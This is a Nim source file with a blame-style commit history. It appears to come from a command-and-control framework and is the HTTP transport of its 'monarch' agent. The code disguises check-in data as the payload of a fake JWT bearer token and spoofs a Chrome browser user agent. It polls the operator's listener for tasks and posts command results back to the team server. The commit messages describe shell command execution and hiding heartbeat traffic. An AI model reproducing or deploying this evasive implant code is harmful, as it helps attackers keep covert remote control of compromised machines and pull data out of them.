src/agent/core/http.nim

import httpclient, json, strformat, strutils, asyncdispatch, base64

import ../../common/[types, utils]

const USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"

proc httpGet*(config: AgentConfig, checkinData: seq[byte]): string = 

    let client = newAsyncHttpClient(userAgent = USER_AGENT)
    var responseBody = ""

    # Define HTTP headers
    # The heartbeat data is placed within a JWT token as the payload (Base64URL-encoded)
    let payload = encode(checkinData, safe = true).replace("=", "")
    client.headers = newHttpHeaders({ 
        "Authorization": fmt"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.{payload}.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30"
    })

    try:
        # Retrieve binary task data from listener and convert it to seq[bytes] for deserialization 
        responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/get")
        return responseBody
    
    except CatchableError as err:
        # When the listener is not reachable, don't kill the application, but check in at the next time
        echo "[-] " & err.msg 
    
    finally:
        client.close()

    return ""

proc httpPost*(config: AgentConfig, data: seq[byte]): bool {.discardable.} = 
    
    let client = newAsyncHttpClient(userAgent = USER_AGENT)

    # Define headers
    client.headers = newHttpHeaders({ 
        "Content-Type": "application/octet-stream",
        "Content-Length": $data.len
    })
    
    let body = Bytes.toString(data)

    try:
        # Send post request to team server
        discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/post", body)
    
    except CatchableError as err:
        echo "[-] " & err.msg 
        return false
    
    finally:
        client.close()

    return true
Updated C2 communication to hide heartbeat data in JWT token. 2025-08-13 13:38:39 +02:00			`import httpclient, json, strformat, strutils, asyncdispatch, base64`
Added monarch agent 2025-05-19 21:56:34 +02:00
Rework module system. Now modules/commands are defined in a single file each, with both the function executed by teh agent and the definition for server-side argument parsing. 2025-07-25 16:41:29 +02:00			`import ../../common/[types, utils]`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`const USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"`
Added monarch agent 2025-05-19 21:56:34 +02:00
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`proc httpGet*(config: AgentConfig, checkinData: seq[byte]): string =`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`let client = newAsyncHttpClient(userAgent = USER_AGENT)`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00			`var responseBody = ""`
Added monarch agent 2025-05-19 21:56:34 +02:00
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`# Define HTTP headers`
Updated C2 communication to hide heartbeat data in JWT token. 2025-08-13 13:38:39 +02:00			`# The heartbeat data is placed within a JWT token as the payload (Base64URL-encoded)`
			`let payload = encode(checkinData, safe = true).replace("=", "")`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`client.headers = newHttpHeaders({`
Updated C2 communication to hide heartbeat data in JWT token. 2025-08-13 13:38:39 +02:00			`"Authorization": fmt"Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.{payload}.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30"`
Implemented Heartbeat/Checkin request with agentId/listenerId in request body to simplify listener URLs 2025-07-22 21:00:39 +02:00			`})`

Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00			`try:`
			`# Retrieve binary task data from listener and convert it to seq[bytes] for deserialization`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`responseBody = waitFor client.getContent(fmt"http://{config.ip}:{$config.port}/get")`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00			`return responseBody`

			`except CatchableError as err:`
			`# When the listener is not reachable, don't kill the application, but check in at the next time`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[-] " & err.msg`
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00
			`finally:`
			`client.close()`
Added monarch agent 2025-05-19 21:56:34 +02:00
Agent fetches serialized task data from prologue web server and successfully parses it. 2025-07-18 18:47:57 +02:00			`return ""`
Added monarch agent 2025-05-19 21:56:34 +02:00
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`proc httpPost*(config: AgentConfig, data: seq[byte]): bool {.discardable.} =`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Implemented agent registration to match new binary structure instead of json. 2025-07-21 22:07:25 +02:00			`let client = newAsyncHttpClient(userAgent = USER_AGENT)`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00			`# Define headers`
			`client.headers = newHttpHeaders({`
			`"Content-Type": "application/octet-stream",`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`"Content-Length": $data.len`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00			`})`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`let body = Bytes.toString(data)`
Fix formatting for multi-line command output and delete tasks after completion. 2025-05-23 16:02:16 +02:00
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00			`try:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`# Send post request to team server`
			`discard waitFor client.postContent(fmt"http://{config.ip}:{$config.port}/post", body)`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00
			`except CatchableError as err:`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00			`echo "[-] " & err.msg`
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00			`return false`
Refactored utility functions to make them more readable and removed separate register endpoint. 2025-08-14 12:25:06 +02:00
Implemented communication with custom binary structure instead of JSON requests 2025-07-19 16:49:27 +02:00			`finally:`
			`client.close()`
Implemented basic shell command execution and result retrieval. Next Step: Remove completed tasks from queue 2025-05-22 20:03:22 +02:00
			`return true`